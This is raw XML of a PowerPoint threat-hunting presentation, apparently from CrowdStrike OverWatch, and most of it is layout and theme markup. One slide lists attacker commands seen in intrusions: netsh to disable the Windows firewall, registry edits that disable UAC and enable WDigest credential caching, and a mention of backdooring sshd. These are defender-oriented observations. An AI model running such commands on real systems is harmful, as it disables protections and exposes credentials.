                    <a:gd name="T7" fmla="*/ 99 h 199"/>
                    <a:gd name="T8" fmla="*/ 100 w 1072"/>
                    <a:gd name="T9" fmla="*/ 0 h 199"/>
                    <a:gd name="T10" fmla="*/ 973 w 1072"/>
                    <a:gd name="T11" fmla="*/ 0 h 199"/>
                    <a:gd name="T12" fmla="*/ 1072 w 1072"/>
                    <a:gd name="T13" fmla="*/ 99 h 199"/>
                    <a:gd name="T14" fmla="*/ 1072 w 1072"/>
                    <a:gd name="T15" fmla="*/ 99 h 199"/>
                    <a:gd name="T16" fmla="*/ 973 w 1072"/>
                    <a:gd name="T17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2" h="199">
                      <a:moveTo>
                        <a:pt x="973" y="199"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="100" y="199"/>
                        <a:pt x="100" y="199"/>
                        <a:pt x="100" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="199"/>
                        <a:pt x="0" y="154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44"/>
                        <a:pt x="45" y="0"/>
                        <a:pt x="100" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="973" y="0"/>
                        <a:pt x="973" y="0"/>
                        <a:pt x="973" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1028" y="0"/>
                        <a:pt x="1072" y="44"/>
                        <a:pt x="1072" y="99"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1072" y="99"/>
                        <a:pt x="1072" y="99"/>
                        <a:pt x="1072" y="99"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1072" y="154"/>
                        <a:pt x="1028" y="199"/>
                        <a:pt x="973" y="1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>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="en-US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8"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1189038" y="-1098551"/>
                  <a:ext cx="163513" cy="371475"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 114 w 114"/>
                    <a:gd name="T1" fmla="*/ 0 h 259"/>
                    <a:gd name="T2" fmla="*/ 0 w 114"/>
                    <a:gd name="T3" fmla="*/ 227 h 259"/>
                    <a:gd name="T4" fmla="*/ 2 w 114"/>
                    <a:gd name="T5" fmla="*/ 25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4" h="259">
                      <a:moveTo>
                        <a:pt x="114" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="52"/>
                        <a:pt x="0" y="134"/>
                        <a:pt x="0" y="227"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="238"/>
                        <a:pt x="1" y="249"/>
                        <a:pt x="2" y="259"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="44450" cap="rnd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>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="en-US" kern="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DC07EF-881E-084D-98F5-823FDA70DD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A8AE41-BC29-BA41-AD66-F86F9B30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CROWDSTRIKE, INC. ALL RIGHTS RESERVED.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E21127-A78A-D64C-9BE9-94FFC47B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5EBC4B8-AB46-2743-AE13-723AB61CA493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373215" y="1059896"/>
            <a:ext cx="8397569" cy="3843407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 algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr sz="1600" b="0" i="0" kern="12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  <a:lvl2pPr marL="715963" indent="-258763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tabLst/>
              <a:defRPr sz="1400" kern="12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200" kern="12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200" kern="120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200" kern="1200" baseline="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/>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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do we do?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Questions – Feel Free to Ask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Karla" pitchFamily="2" charset="0"/>
              <a:ea typeface="Karla" pitchFamily="2" charset="0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latin typeface="Karla" pitchFamily="2" charset="0"/>
              <a:ea typeface="Karla" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/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latin typeface="Karla" pitchFamily="2" charset="0"/>
              <a:ea typeface="Karla" pitchFamily="2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28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Collection Bias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Event Enrichment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MITRE ATT&amp;CK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we see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Nuggets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26965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259" y="77380"/>
            <a:ext cx="6662145" cy="575013"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collection bias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790" y="857511"/>
            <a:ext cx="7514751" cy="35732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OverWatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> threat hunting against Falcon sensor telemetry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Notification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Customer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Hands on keyboard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Nation-state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eCrime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1366" y="118945"/>
            <a:ext cx="7219706" cy="567579"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Event enrichment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199" y="812906"/>
            <a:ext cx="8190108" cy="39543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Vertical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Geo-region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Operating system(s)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Attribution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MITRE ATT&amp;CK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31136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7844" y="83438"/>
            <a:ext cx="2780371" cy="515540"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mitre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>att&amp;ck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2F736-3E3F-3B47-A22C-1E3550312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682" y="83438"/>
            <a:ext cx="3665089" cy="4820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265712-0591-AF4C-B471-83FE0A18B66C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5603630" y="3692769"/>
            <a:ext cx="3188678" cy="75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www.crowdstrike.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/resources/reports/2019-crowdstrike-global-threat-report/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3783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8009" y="89209"/>
            <a:ext cx="6957298" cy="552581"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Things we see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887" y="1002763"/>
            <a:ext cx="7514751" cy="35926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Actors modifying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Actor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25753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170" y="151295"/>
            <a:ext cx="7141360" cy="612611"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Actor Modifying infrastructure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333" y="1006061"/>
            <a:ext cx="8300197" cy="37612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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disable Windows Firewall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netsh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advfirewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allprofiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> state off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="5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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disable User Account Control</a:t>
            </a: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reg.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EnableLUA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /t REG_DWORD /d 0 /f0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
            </a:pP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Modify system binaries – compile new functions into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh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sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to record credentials, permit access via “magic key”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42334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2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.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3B11-065C-5545-BF26-5AD661B2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170" y="151295"/>
            <a:ext cx="7141360" cy="612611"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Actor Modifying infrastructure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15E30-6EA4-0944-90F7-19688E669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333" y="1006061"/>
            <a:ext cx="8300197" cy="37612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1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> add HKLM\SYSTEM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\Control\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SecurityProviders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wdigest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UseLogonCredential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> REG_DWORD /d 1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1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disable remote UAC restrictions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1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System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1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Value: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LocalAccountTokenFilterPolicy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, set to “1”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1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disable machine account password changes on a workstation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1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HKLM\System\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\Services\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Netlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\Parameters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1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Value: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DisablePasswordChange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, set to “1”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1868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Crowdstrike Template">
  <a:themeElements>
    <a:clrScheme name="Custom 30">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="3A3C3C"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="DFDFDF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="22789B"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="E71D16"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="ACC633"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="2C2C2C"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="59B8D9"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="EB391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282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smtClean="0">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:latin typeface="Karla" charset="0"/>
            <a:ea typeface="Karla" charset="0"/>
            <a:cs typeface="Karl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owdstrike_v2_Dark" id="{6E77F92F-9F4A-C640-892A-CEDADBCE4107}" vid="{016C0709-B1B4-BA4E-81F8-AB66AA215E64}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Assets">
  <a:themeElements>
    <a:clrScheme name="Custom 30">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="3A3C3C"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="DFDFDF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="22789B"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="E71D16"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="ACC633"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="2C2C2C"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="59B8D9"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="EB391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282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smtClean="0">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:latin typeface="Karla" charset="0"/>
            <a:ea typeface="Karla" charset="0"/>
            <a:cs typeface="Karl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owdstrike_v2_Dark" id="{6E77F92F-9F4A-C640-892A-CEDADBCE4107}" vid="{A66548A3-6551-F340-8256-7A9E00EF9F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Crowdstrike_v2_Dark</Template>
  <TotalTime>59950</TotalTime>
  <Words>1508</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>234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ITC Avant Garde Gothic Pro Book</vt:lpstr>
      <vt:lpstr>ITC Avant Garde Gothic Pro Demi</vt:lpstr>
      <vt:lpstr>ITC Avant Garde Gothic Pro Extra Light</vt:lpstr>
      <vt:lpstr>ITC Avant Garde Pro Bk</vt:lpstr>
      <vt:lpstr>ITC Avant Garde Pro Md</vt:lpstr>
      <vt:lpstr>ITC Avant Garde Pro XLt</vt:lpstr>
      <vt:lpstr>Karla</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Crowdstrike Template</vt:lpstr>
      <vt:lpstr>Assets</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>INtro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454</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-07-03T18:47:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-24T14:46:22Z</dcterms:modified>
</cp:coreProperties>
</file>